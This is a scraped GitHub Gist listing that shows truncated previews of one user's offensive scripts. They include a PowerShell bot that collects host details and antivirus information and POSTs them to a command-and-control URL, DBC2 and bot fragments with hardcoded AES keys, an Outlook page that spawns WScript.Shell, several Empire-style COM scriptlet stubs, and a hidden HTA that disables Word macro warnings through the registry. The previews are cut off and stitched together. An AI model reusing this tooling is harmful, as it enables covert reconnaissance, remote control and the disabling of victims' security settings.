Skip to content

Instantly share code, notes, and snippets.

$spl = 'BC_SPL';$vn = 'BC_Vic';$wTime = 1500;[System.Net.HttpWebRequest]$Req;function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi.replace('Microsoft Windows','Win') + ' SP' + (Get-WmiObject Win32_OperatingSystem).ServicePackMajorVersion + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$u = $vn + '_' + $HWD + $spl + $mch + ' \ ' + $usr + $spl + $wi + $spl + $spl + 'PS1 0.1' + $spl + $av + $spl;return $u} catch {Start-Sleep -m $wTime}};function post ($cmdv, $v) { try { $Req = [System.Net.HttpWebRequest]::Create('http://127.0.0.1:1993/' + $cmdv);$Req.Method = 'POST';$Req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req.GetRequestStream();$buffer = [System.Text.Encoding]::UTF8.GetBytes([
Function Invoke-DBC2{
Function Invoke-Bot{
$Global:secretIV = "Key@123Key@123fd"
$Global:SecretKey = "secret#456!23key"
Function Aes-Decrypt($DecryptData){
#Use the AES cipher and represent it as an object.
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
@Elm0D
Elm0D / nj6.sct
Created September 28, 2017 14:53
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<html>
<body>
<script type="text/vbscript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- USAGE -->
<?XML version="1.0"?>
<scriptlet>
<registration
description="FofX"
progid="FofX"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<?XML version="1.0"?>
<scriptlet>
<registration
description="FofX"
progid="FofX"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<?XML version="1.0"?>
<scriptlet>
<registration
description="WzVQ"
progid="WzVQ"
version="1.00"
classid="{00001111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">